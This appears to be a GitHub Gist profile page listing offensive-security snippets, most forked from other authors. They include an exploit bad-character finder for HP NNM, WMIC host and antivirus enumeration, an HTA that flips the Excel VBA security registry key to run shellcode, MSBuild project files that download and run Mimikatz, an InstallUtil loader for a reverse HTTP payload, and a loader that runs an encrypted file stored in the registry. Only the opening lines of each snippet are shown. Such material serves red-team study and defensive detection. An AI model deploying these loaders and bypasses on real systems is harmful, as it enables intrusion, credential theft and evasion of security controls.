Skip to content

Instantly share code, notes, and snippets.

View DanielRTeixeira's full-sized avatar

Daniel DanielRTeixeira

63 followers · 8 following
View GitHub Profile
@DanielRTeixeira
DanielRTeixeira / badchars.py
Created October 31, 2018 21:28
Find bad characters in HP NNM 7.51 with winappdbg
from winappdbg import *
import os, sys, socket, time, threading
## Global Vars
allchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
@DanielRTeixeira
DanielRTeixeira / wmic_cmds.txt
Created July 14, 2018 17:33 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@DanielRTeixeira
DanielRTeixeira / CalcExcel.hta
Created November 2, 2017 15:28 — forked from nicholasmckinney/CalcExcel.hta
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@DanielRTeixeira
DanielRTeixeira / katz.xml
Created November 2, 2017 15:28 — forked from nicholasmckinney/katz.xml
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@DanielRTeixeira
DanielRTeixeira / katz.xml
Created November 2, 2017 15:28 — forked from nicholasmckinney/katz.xml
MSBuild - Mimikatz - Server 2016
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@DanielRTeixeira
DanielRTeixeira / RemoteDLLGuest.cs
Created November 2, 2017 15:28 — forked from nicholasmckinney/RemoteDLLGuest.cs
Remote DLLGuest
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
@DanielRTeixeira
DanielRTeixeira / rev_http.cs
Created November 2, 2017 15:28 — forked from nicholasmckinney/rev_http.cs
InstallUtil - Download And Execute Reverse_HTTP Payload
using System;
using System.Net;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs
@DanielRTeixeira
DanielRTeixeira / RegRunner.cs
Created November 2, 2017 15:28 — forked from nicholasmckinney/RegRunner.cs
Executes Encrypted File From Registry
using System;
using System.IO;
using System.Text;
using Microsoft.Win32;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@DanielRTeixeira
DanielRTeixeira / PacHost.ps1
Created November 2, 2017 15:28 — forked from nicholasmckinney/PacHost.ps1
function Start-PACFileHosting()
{
# Example PAC File Hosting
# Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html
# example: http://localhost:8083/i.pac
# Be Certain Line 19 matches your Interceptor Config
Start-Job -ScriptBlock {
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8083/")
@DanielRTeixeira
DanielRTeixeira / web.config
Created November 2, 2017 15:27 — forked from nicholasmckinney/web.config
Encrypt Random Shit with aspnet_regiis.exe
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" -->
<!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" -->
<!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx -->
<!-- Example by @subTee -->
<connectionStrings>
<add name="constr" connectionString="blah" />
</connectionStrings>
<system.web>